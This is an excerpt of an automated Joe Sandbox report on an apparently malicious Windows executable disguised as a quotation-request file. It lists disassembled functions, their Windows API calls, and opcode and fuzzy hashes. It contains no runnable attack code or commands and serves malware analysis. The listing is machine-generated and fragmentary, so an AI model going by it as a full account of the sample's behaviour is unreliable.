                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1506413516-4153970271
                                                                                • Opcode ID: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
                                                                                • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                                                                                • Opcode Fuzzy Hash: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
                                                                                • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                                                                                APIs
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                  • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$_memmove
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 2279737902-1007645807
                                                                                • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 208665112-3771769585
                                                                                • Opcode ID: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
                                                                                • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                • Opcode Fuzzy Hash: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
                                                                                • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 00464F7A
                                                                                  • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                                                                • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                • SetActiveWindow.USER32 ref: 0046500B
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                • IsWindow.USER32 ref: 0046504F
                                                                                • EndDialog.USER32(00000000), ref: 00465060
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                                APIs
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                                • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                                • _memset.LIBCMT ref: 0046D7E1
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                • Opcode ID: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
                                                                                • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                                                                • Opcode Fuzzy Hash: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
                                                                                • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                                • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                                APIs
                                                                                  • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                                APIs
                                                                                  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                                • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                                • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __i64tow__itow__swprintf
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 421087845-2263619337
                                                                                • Opcode ID: 8abf7d2c726fb0a80ba3e8f54fdf7a871a2ada4f1255de1d4a63342638e48a00
                                                                                • Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
                                                                                • Opcode Fuzzy Hash: 8abf7d2c726fb0a80ba3e8f54fdf7a871a2ada4f1255de1d4a63342638e48a00
                                                                                • Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0048716A
                                                                                • CreateMenu.USER32 ref: 00487185
                                                                                • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                • IsMenu.USER32(?), ref: 00487237
                                                                                • CreatePopupMenu.USER32 ref: 00487241
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                • DrawMenuBar.USER32 ref: 00487276
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                • String ID: 0$F
                                                                                • API String ID: 176399719-3044882817
                                                                                • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                                • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                                • DeleteDC.GDI32(00000000), ref: 00487594
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                                • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                                • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                                • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00426E3E
                                                                                  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                • __allrem.LIBCMT ref: 00426F80
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                • __allrem.LIBCMT ref: 00426FB3
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                • __allrem.LIBCMT ref: 00426FE8
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                • __invoke_watson.LIBCMT ref: 00427077
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00462542
                                                                                • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00462675
